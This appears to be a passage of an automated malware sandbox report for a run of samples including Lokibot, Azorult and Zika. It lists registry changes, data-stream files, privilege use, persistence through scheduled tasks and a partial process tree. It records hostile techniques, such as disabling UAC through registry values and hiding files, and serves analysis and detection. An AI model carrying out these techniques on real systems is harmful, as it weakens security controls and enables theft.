Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	msedge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\FFlags = "1"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	wini.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1279544337-3716153908-718418795-1000\{7F1BC3ED-6F13-46F5-B8AF-DC4E62ACD678}	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	NOTEPAD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\LogicalViewMode = "1"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\MIME\Database	winit.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\Shell\SniffedFolderType = "Documents"	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	NOTEPAD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\GroupByKey:PID = "0"	NOTEPAD.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings	NOTEPAD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	NOTEPAD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{7D49D726-3C21-4F05-99AA-FDC2C9474656}\IconSize = "16"	NOTEPAD.EXE

NTFS ADS 19 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\{FA563315-C499-45CE-ADC6-EB84DB3A0AE3}\8tr.exe:Zone.Identifier	WINWORD.EXE
File created	C:\Users\Admin\Downloads\L0Lz.bat:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Zika.exe:Zone.Identifier	firefox.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Users\Admin\Downloads\Lokibot.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\Azorult.exe:Zone.Identifier	firefox.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\InspectorOfficeGadget.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Users\Admin\Downloads\metrofax.doc:Zone.Identifier	firefox.exe
File opened for modification	C:\ProgramData\Microsoft\Intel\winmgmts:\localhost\root\CIMV2	taskhostw.exe
File created	C:\Users\Admin\Downloads\FreeYoutubeDownloader.exe:Zone.Identifier	firefox.exe
File created	C:\Program Files\7-Zip\Uninstall.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Users\Admin\Downloads\ArcticBomb.exe:Zone.Identifier	firefox.exe
File created	C:\Program Files\7-Zip\7z.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\7-Zip\7zFM.exe\:Zone.Identifier:$DATA	Zika.exe
File created	C:\Program Files\7-Zip\7zG.exe\:Zone.Identifier:$DATA	Zika.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
5276	NOTEPAD.EXE

Runs .reg file with regedit 2 IoCs

pid	Process
1852	regedit.exe
4584	regedit.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
6452	schtasks.exe
5020	schtasks.exe
6628	schtasks.exe
6752	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 3 IoCs

pid	Process
1936	WINWORD.EXE
1936	WINWORD.EXE
6612	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1072	Lokibot.exe
1072	Lokibot.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
1072	Lokibot.exe
1072	Lokibot.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
4200	Azorult.exe
1936	rutserv.exe
1936	rutserv.exe
1936	rutserv.exe
1936	rutserv.exe
1936	rutserv.exe
1936	rutserv.exe
6036	rutserv.exe
6036	rutserv.exe
1964	rutserv.exe
1964	rutserv.exe
5076	rutserv.exe
5076	rutserv.exe
5076	rutserv.exe
5076	rutserv.exe
5076	rutserv.exe
5076	rutserv.exe
3548	rfusclient.exe
3548	rfusclient.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe
3356	winit.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
6164	taskhostw.exe

Suspicious behavior: LoadsDriver 2 IoCs

pid	Process
664	Process not Found
664	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs

pid	Process
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe
6808	msedge.exe

Suspicious behavior: SetClipboardViewer 1 IoCs

pid	Process
2928	rfusclient.exe

Suspicious use of AdjustPrivilegeToken 59 IoCs

description	pid	Process
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	1072	Lokibot.exe
Token: SeDebugPrivilege	2804	taskmgr.exe
Token: SeSystemProfilePrivilege	2804	taskmgr.exe
Token: SeCreateGlobalPrivilege	2804	taskmgr.exe
Token: 33	2804	taskmgr.exe
Token: SeIncBasePriorityPrivilege	2804	taskmgr.exe
Token: SeDebugPrivilege	1936	rutserv.exe
Token: SeDebugPrivilege	1964	rutserv.exe
Token: SeTakeOwnershipPrivilege	5076	rutserv.exe
Token: SeTcbPrivilege	5076	rutserv.exe
Token: SeTcbPrivilege	5076	rutserv.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	532	Lokibot.exe
Token: SeDebugPrivilege	2764	taskkill.exe
Token: SeDebugPrivilege	5360	taskkill.exe
Token: SeDebugPrivilege	5224	taskkill.exe
Token: SeDebugPrivilege	6576	powershell.exe
Token: SeAuditPrivilege	4584	svchost.exe
Token: SeDebugPrivilege	6492	RDPWInst.exe
Token: SeDebugPrivilege	632	taskkill.exe
Token: SeDebugPrivilege	7028	taskkill.exe
Token: SeDebugPrivilege	7040	taskmgr.exe
Token: SeSystemProfilePrivilege	7040	taskmgr.exe
Token: SeCreateGlobalPrivilege	7040	taskmgr.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: 33	7040	taskmgr.exe
Token: SeIncBasePriorityPrivilege	7040	taskmgr.exe
Token: SeDebugPrivilege	7164	taskmgr.exe
Token: SeSystemProfilePrivilege	7164	taskmgr.exe
Token: SeCreateGlobalPrivilege	7164	taskmgr.exe
Token: 33	7164	taskmgr.exe
Token: SeIncBasePriorityPrivilege	7164	taskmgr.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	5148	taskmgr.exe
Token: SeSystemProfilePrivilege	5148	taskmgr.exe
Token: SeCreateGlobalPrivilege	5148	taskmgr.exe
Token: 33	5148	taskmgr.exe
Token: SeIncBasePriorityPrivilege	5148	taskmgr.exe
Token: SeDebugPrivilege	6248	FreeYoutubeDownloader.exe
Token: SeDebugPrivilege	6248	FreeYoutubeDownloader.exe
Token: SeDebugPrivilege	6248	FreeYoutubeDownloader.exe
Token: SeDebugPrivilege	6248	FreeYoutubeDownloader.exe
Token: SeDebugPrivilege	6436	taskkill.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: SeDebugPrivilege	6088	Zika.exe
Token: SeDebugPrivilege	6808	msedge.exe
Token: SeDebugPrivilege	6808	msedge.exe
Token: SeDebugPrivilege	456	msedge.exe
Token: SeDebugPrivilege	456	msedge.exe
Token: SeDebugPrivilege	6764	taskmgr.exe
Token: SeSystemProfilePrivilege	6764	taskmgr.exe
Token: SeCreateGlobalPrivilege	6764	taskmgr.exe
Token: SeDebugPrivilege	3684	firefox.exe
Token: 33	6764	taskmgr.exe
Token: SeIncBasePriorityPrivilege	6764	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
7040	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
2804	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe
7040	taskmgr.exe

Suspicious use of SetWindowsHookEx 64 IoCs

pid	Process
5276	NOTEPAD.EXE
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
4200	Azorult.exe
3680	wini.exe
3356	winit.exe
1936	rutserv.exe
6036	rutserv.exe
1964	rutserv.exe
5076	rutserv.exe
2188	cheat.exe
3700	taskhost.exe
4580	ink.exe
412	P.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
1936	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
6612	WINWORD.EXE
5728	R8.exe
3356	winlogon.exe
6164	taskhostw.exe
3728	winlogon.exe
1936	WINWORD.EXE
1936	WINWORD.EXE
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe
3684	firefox.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 1460 wrote to memory of 3684	1460	firefox.exe	109
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 4972	3684	firefox.exe	110
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111
PID 3684 wrote to memory of 5580	3684	firefox.exe	111

System policy modification 1 TTPs 3 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	Azorult.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	Azorult.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 6 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
4148	attrib.exe
5916	attrib.exe
7120	attrib.exe
5360	attrib.exe
6896	attrib.exe
1156	attrib.exe

outlook_office_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Lokibot.exe

outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Lokibot.exe

C:\Windows\system32\NOTEPAD.EXE
C:\Windows\system32\NOTEPAD.EXE C:\Users\Admin\AppData\Local\Temp\EICAR.txt
1⤵
- Modifies registry class
- Opens file in notepad (likely ransom note)
- Suspicious use of SetWindowsHookEx
PID:5276

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4700

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1460
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe"
  2⤵
  - Subvert Trust Controls: Mark-of-the-Web Bypass
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:3684
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2020 -prefsLen 27099 -prefMapHandle 2024 -prefMapSize 270279 -ipcHandle 2100 -initialChannelId {4a67abd0-ec18-485d-a732-2b2139552f8e} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -appDir "C:\Program Files\Mozilla Firefox\browser" - 1 gpu
    3⤵
    PID:4972
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 2480 -prefsLen 27135 -prefMapHandle 2484 -prefMapSize 270279 -ipcHandle 2492 -initialChannelId {b6a569e1-6253-44ff-8916-9d65b2543275} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 2 socket
    3⤵
    PID:5580
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3896 -prefsLen 27276 -prefMapHandle 3900 -prefMapSize 270279 -jsInitHandle 3904 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3908 -initialChannelId {7b980399-d6c5-431a-977a-ac799837112e} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 3 tab
    3⤵
    - Checks processor information in registry
    PID:2920
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -prefsHandle 4080 -prefsLen 27276 -prefMapHandle 4084 -prefMapSize 270279 -ipcHandle 4180 -initialChannelId {f50307e5-2855-46f6-a2ef-ee5d2d0f6a93} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -appDir "C:\Program Files\Mozilla Firefox\browser" - 4 rdd
    3⤵
    PID:2320
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 3016 -prefsLen 34775 -prefMapHandle 2660 -prefMapSize 270279 -jsInitHandle 2880 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 3144 -initialChannelId {f8c5bc36-ca50-4232-a5c2-94d249378685} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 5 tab
    3⤵
    - Checks processor information in registry
    PID:3444
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -parentBuildID 20250130195129 -sandboxingKind 0 -prefsHandle 4928 -prefsLen 35012 -prefMapHandle 4936 -prefMapSize 270279 -ipcHandle 4932 -initialChannelId {700c210d-efea-46e1-9e9a-83d40224dc92} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 6 utility
    3⤵
    - Checks processor information in registry
    PID:5216
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5192 -prefsLen 32900 -prefMapHandle 5196 -prefMapSize 270279 -jsInitHandle 5200 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5208 -initialChannelId {e9f89d75-bb21-4173-9843-cfe5787ee770} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 7 tab
    3⤵
    - Checks processor information in registry
    PID:3212
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5456 -prefsLen 32952 -prefMapHandle 5460 -prefMapSize 270279 -jsInitHandle 5464 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5468 -initialChannelId {e47328dc-ad38-4994-896d-480b829197e0} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 8 tab
    3⤵
    - Checks processor information in registry
    PID:6124
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5664 -prefsLen 32952 -prefMapHandle 5668 -prefMapSize 270279 -jsInitHandle 5672 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 5676 -initialChannelId {79baa734-ce1e-43ad-853b-81b4d56b123f} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 9 tab
    3⤵
    - Checks processor information in registry
    PID:1380
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 6340 -prefsLen 33071 -prefMapHandle 6360 -prefMapSize 270279 -jsInitHandle 6364 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6372 -initialChannelId {e227d839-1702-4e53-88a4-f6250bcd8d8e} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 10 tab
    3⤵
    - Checks processor information in registry
    PID:3144
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc -isForBrowser -prefsHandle 5472 -prefsLen 33071 -prefMapHandle 5480 -prefMapSize 270279 -jsInitHandle 5484 -jsInitLen 253512 -parentBuildID 20250130195129 -ipcHandle 6208 -initialChannelId {a6ce1a43-09b6-496a-94fc-e7a355d53ca9} -parentPid 3684 -crashReporter "\\.\pipe\gecko-crash-server-pipe.3684" -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - 11 tab
    3⤵
    - Checks processor information in registry
    PID:5928
- - C:\Users\Admin\Downloads\Lokibot.exe
    "C:\Users\Admin\Downloads\Lokibot.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1072
  - - C:\Users\Admin\Downloads\Lokibot.exe
      "C:\Users\Admin\Downloads\Lokibot.exe"
